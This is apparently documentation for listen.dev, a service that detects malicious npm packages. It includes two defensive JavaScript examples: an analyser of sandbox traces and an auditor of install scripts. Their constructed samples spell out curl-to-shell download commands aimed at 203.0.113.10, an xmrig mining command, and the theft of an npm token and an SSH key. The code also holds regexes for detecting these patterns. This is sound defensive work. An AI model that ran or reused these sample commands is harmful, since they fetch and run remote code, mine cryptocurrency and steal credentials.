Detection approach
listen.dev is powered by a threat detection engine that combines runtime monitoring and behavioural analysis to detect adversarial activity at the earliest stage, before it reaches your systems.
How does the detection work?
We maintain an index of packages published on open source package registries (such as npm) and constantly monitor them through our analysis pipeline and threat research team.
- We observe every new package version published upstream and analyze its behaviour inside sandboxed environments on our infrastructure.
- We keep track of behavioural changes between subsequent releases of a package and flag tampering or suspicious updates in newly published versions.
- We provide users with relevant context on each detected behaviour, such as execution traces and priority levels.
listen.dev not only flags malicious packages and alerts users before they consume them in their downstream environments, but also delivers context on how third-party components behave and interact with their systems. This knowledge lets teams build a comprehensive understanding of their supply chain risk and maintain a proactive security posture.
What kind of harmful behaviours does it detect?
We watch for common attack vectors and known indicators of harmful behavior including:
- Spawning of suspicious child processes
- Sensitive data/credential exfiltration (e.g. malicious code exfiltrating environment variables or secrets)
- Suspicious network connections (e.g. pulling a malicious payload from an unauthorized source)
- Suspicious filesystem access (e.g. reading or tampering with the contents of sensitive directories such as .ssh)
- Crypto-mining activity
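The list above reads as a set of rules over an execution trace, and the point that is easy to miss is the correlation between them: reading `NPM_TOKEN` or `~/.ssh` on its own is ambiguous, but doing so and then opening a connection to a host the install step has no business talking to is the exfiltration pattern. The following is an added example, not listen.dev's engine or code. It assumes a trace format (a flat list of `spawn`, `env_read`, `file_read` and `connect` events with a sequence number), an allowlist of expected hosts, and a few keyword heuristics, all of which are this example's own assumptions; the sample trace is constructed.

```javascript
"use strict";

// Added example (not listen.dev code). The trace format is an assumption: a flat
// list of events recorded while a package's install step ran in a sandbox.
// Event shapes: spawn {pid, child, cmd}, env_read {pid, name},
// file_read {pid, path}, connect {pid, host, port}; every event carries a seq.

const ALLOWED_HOSTS = new Set(["registry.npmjs.org"]); // hosts an install is expected to reach (assumption)
const SENSITIVE_PATH = /\/\.(ssh|aws|npmrc|gitconfig|docker)(\/|$)/;
const SECRET_ENV = /(TOKEN|SECRET|PASSWORD|PASSWD|API_KEY|PRIVATE_KEY|AWS_ACCESS)/;
const MINER_HINTS = /\b(xmrig|minerd|cpuminer)\b|stratum\+tcp/i;
const PIPE_TO_SHELL = /\b(curl|wget)\b.*\|\s*(sh|bash)\b/;
const PRIORITY = { low: 1, medium: 2, high: 3, critical: 4 };

// Classify one event on its own. Returns null when the event is unremarkable.
function classifyEvent(e) {
  switch (e.type) {
    case "spawn":
      if (MINER_HINTS.test(e.cmd)) return { category: "crypto-mining", priority: "critical" };
      if (PIPE_TO_SHELL.test(e.cmd)) return { category: "suspicious child process", priority: "high" };
      return { category: "child process", priority: "low" };
    case "env_read":
      return SECRET_ENV.test(e.name) ? { category: "credential access", priority: "high" } : null;
    case "file_read":
      return SENSITIVE_PATH.test(e.path) ? { category: "suspicious filesystem access", priority: "high" } : null;
    case "connect":
      return ALLOWED_HOSTS.has(e.host) ? null : { category: "suspicious network connection", priority: "medium" };
    default:
      return null;
  }
}

// Human-readable evidence line for a finding.
function describe(e) {
  switch (e.type) {
    case "spawn":     return `pid ${e.pid} spawned pid ${e.child}: ${e.cmd}`;
    case "env_read":  return `pid ${e.pid} read env ${e.name}`;
    case "file_read": return `pid ${e.pid} read ${e.path}`;
    case "connect":   return `pid ${e.pid} connected to ${e.host}:${e.port}`;
    default:          return JSON.stringify(e);
  }
}

// Walk the trace in order, remember which processes touched secrets (taint is
// inherited by their children), and escalate an unexpected outbound connection
// from a tainted process to an exfiltration finding.
function analyzeTrace(events) {
  const tainted = new Set();
  const findings = [];
  for (const e of [...events].sort((a, b) => a.seq - b.seq)) {
    let f = classifyEvent(e);
    if (e.type === "spawn" && tainted.has(e.pid)) tainted.add(e.child);
    if (f && (e.type === "env_read" || e.type === "file_read")) tainted.add(e.pid);
    if (f && e.type === "connect" && tainted.has(e.pid)) {
      f = { category: "data exfiltration", priority: "critical" };
    }
    if (f) findings.push({ seq: e.seq, pid: e.pid, ...f, evidence: describe(e) });
  }
  const maxPriority = findings.reduce(
    (m, x) => (m === null || PRIORITY[x.priority] > PRIORITY[m] ? x.priority : m), null);
  return { findings, maxPriority };
}

// Constructed sample trace: a preinstall script reads a token and an SSH key,
// ships them to an unknown host, then pulls a script and starts a miner.
const SAMPLE_TRACE = [
  { seq: 1, pid: 100, type: "spawn", child: 101, cmd: "node preinstall.js" },
  { seq: 2, pid: 101, type: "env_read", name: "NPM_TOKEN" },
  { seq: 3, pid: 101, type: "file_read", path: "/home/ci/.ssh/id_ed25519" },
  { seq: 4, pid: 101, type: "connect", host: "registry.npmjs.org", port: 443 },
  { seq: 5, pid: 101, type: "connect", host: "203.0.113.10", port: 8443 },
  { seq: 6, pid: 101, type: "spawn", child: 102, cmd: "curl -s http://203.0.113.10/x.sh | sh" },
  { seq: 7, pid: 102, type: "spawn", child: 103, cmd: "./xmrig -o stratum+tcp://pool.example:3333" },
];

console.log(JSON.stringify(analyzeTrace(SAMPLE_TRACE), null, 2));
```

Run on the sample trace this yields six findings, with the connection to 203.0.113.10 reported as critical data exfiltration because the same process had already read `NPM_TOKEN` and the SSH key; the connection to registry.npmjs.org produces nothing. The keyword lists are deliberately small; a real engine would key on syscall-level evidence rather than command strings.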
Our initial coverage focuses on threats that trigger during the installation/build phase, the stage at which third-party open source code is bundled with internal application code.
The most common malware delivery method on npm is install scripts, which allow arbitrary code execution on the host at install time. According to a 2022 paper, 94% of malicious packages contained at least one install script. Read more about this attack vector in this blog post.
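Because npm runs the `preinstall`, `install`, `postinstall` and (for local and git installs) `prepare` scripts declared in a package's `package.json` automatically, a dependency audit should at minimum enumerate which packages declare them and what they run. The following is an added example, not listen.dev's or npm's code: a static pass over parsed manifests that reports every install-time hook and ranks it with a few keyword heuristics (piping a download into a shell, `node -e`, base64 decoding), which are this example's own assumptions rather than any standard. The manifests are constructed stand-ins for `node_modules/*/package.json`.

```javascript
"use strict";

// Added example (not listen.dev code): a static audit of package manifests for
// install-time lifecycle hooks. Input is an array of parsed package.json objects
// (constructed inline below); the risk heuristics are assumptions, not a standard.

// npm runs these automatically as part of installing a package.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Command shapes that fetch or evaluate code at install time.
const HIGH_RISK = [
  { why: "downloads and executes remote content", re: /\b(curl|wget)\b.*\|\s*(sh|bash|node)\b/ },
  { why: "evaluates inline code", re: /\bnode\s+(-e|--eval)\b/ },
  { why: "decodes an encoded payload", re: /\bbase64\b.*(-d|--decode)\b|Buffer\.from\([^)]*base64/ },
];
// Common native-addon build steps: usually legitimate, still worth a glance.
const EXPECTED_BUILD = /^(node-gyp|prebuild-install|node-pre-gyp|cmake-js)\b/;
const RANK = { low: 1, medium: 2, high: 3 };

// Returns one finding per (package, hook) pair, highest risk first.
function auditInstallScripts(manifests) {
  const findings = [];
  for (const m of manifests) {
    const scripts = m.scripts && typeof m.scripts === "object" ? m.scripts : {};
    for (const hook of INSTALL_HOOKS) {
      const cmd = scripts[hook];
      if (typeof cmd !== "string") continue;
      const hit = HIGH_RISK.find((h) => h.re.test(cmd));
      const risk = hit ? "high" : EXPECTED_BUILD.test(cmd.trim()) ? "low" : "medium";
      findings.push({
        package: `${m.name}@${m.version}`,
        hook,
        command: cmd,
        risk,
        reason: hit ? hit.why : risk === "low" ? "native build step" : "runs an arbitrary command at install time",
      });
    }
  }
  return findings.sort((a, b) => RANK[b.risk] - RANK[a.risk]);
}

// Constructed manifests standing in for node_modules/*/package.json.
const SAMPLE_MANIFESTS = [
  { name: "native-addon", version: "1.0.0", scripts: { install: "node-gyp rebuild", test: "mocha" } },
  { name: "plain-lib", version: "2.0.1", scripts: { test: "jest" } },
  { name: "evil-utils", version: "0.0.3", scripts: {
      preinstall: "curl -s http://203.0.113.10/i.sh | sh",
      postinstall: "node -e \"require('./setup')\"" } },
  { name: "cli-tool", version: "3.1.0", scripts: { postinstall: "node scripts/postinstall.js" } },
];

for (const f of auditInstallScripts(SAMPLE_MANIFESTS)) {
  console.log(`[${f.risk}] ${f.package} ${f.hook}: ${f.command}  (${f.reason})`);
}
```

Two npm-native checks complement this: `npm install --ignore-scripts` disables lifecycle scripts for the whole install (including your own project's and any native builds that depend on them), and `npm pkg get scripts` run inside a package directory prints its scripts block so a flagged command can be inspected directly. A `medium` finding such as `node scripts/postinstall.js` is exactly the case static inspection cannot settle; that is where the sandboxed runtime analysis described above takes over.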
Check out our roadmap for what threat vectors we'll be covering in future releases. If you have any specific requests or feedback, please reach out to us.
What kinds of attacks does it protect against?
listen.dev provides a first line of defense against a range of known and unknown supply chain threats, including, among others:
- Typo-squatting
- Dependency confusion
- Dependency poisoning through malware injection
- Package & maintainer hijacking
Why aren't traditional approaches sufficient against supply chain attacks?
The supply chain threat landscape is evolving rapidly, with today's adversaries using increasingly sophisticated and novel methods to craft attacks. Meanwhile, security tooling has not kept up.
- Traditional dependency scanners and SCA tools work by matching your dependencies against databases of known, publicly disclosed vulnerabilities (CVEs), so your protection is only as good as how up to date those databases are.
- If a package carries something not yet in any database (a freshly planted backdoor, malware or a zero-day), the database entry appears only after the information is already public, and in most cases that is too late to contain the harm.
Finding and patching only known vulnerabilities in your dependencies is a reactive approach and does not provide sufficient defense against modern supply chain attacks. Read more about the difference between known vulnerabilities and supply chain attacks in this blog post.